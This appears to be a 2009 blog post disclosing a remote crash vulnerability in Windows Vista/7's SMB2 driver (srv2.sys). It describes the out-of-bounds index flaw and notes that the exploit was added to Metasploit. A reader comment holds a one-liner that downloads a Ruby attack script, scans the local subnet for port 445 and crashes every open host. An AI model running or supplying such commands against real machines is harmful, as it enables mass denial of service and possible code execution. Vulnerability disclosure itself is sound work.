Tuesday, September 8, 2009

Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Exploit

An attacker can remotly crash any Vista/Windows 7 machine with SMB enable

BACKGROUND
-------------------------
Windows vista and newer Windows comes with a new SMB version named SMB2.
See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

DESCRIPTION
-------------------------
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication.

PROOF OF CONCEPT

Update:

Added to Metasploit thx HD Moore :)

Check also: Regarding Microsoft srv2.sys SMB2.0 NEGOTIATE BSOD

This vulnerability is not only a BSOD flaw. It allows remote code
execution. The execution of code is far from being reliable though (at
the momment).

The flaw is a out-of-bounds indexing. We can fully control the 16 bit
value used as index within the function table.

1 comment:

digital-in said...

wget ***.lan.mystuff/clean445.rb && nmap -p445 $(ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d. -f 1,2,3).1-254 | grep -B3 open | grep -o -e '[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+' | xargs ruby clean445.rb
BSoD every Windows Vista / 7 with 445 open on my lan. So nice !!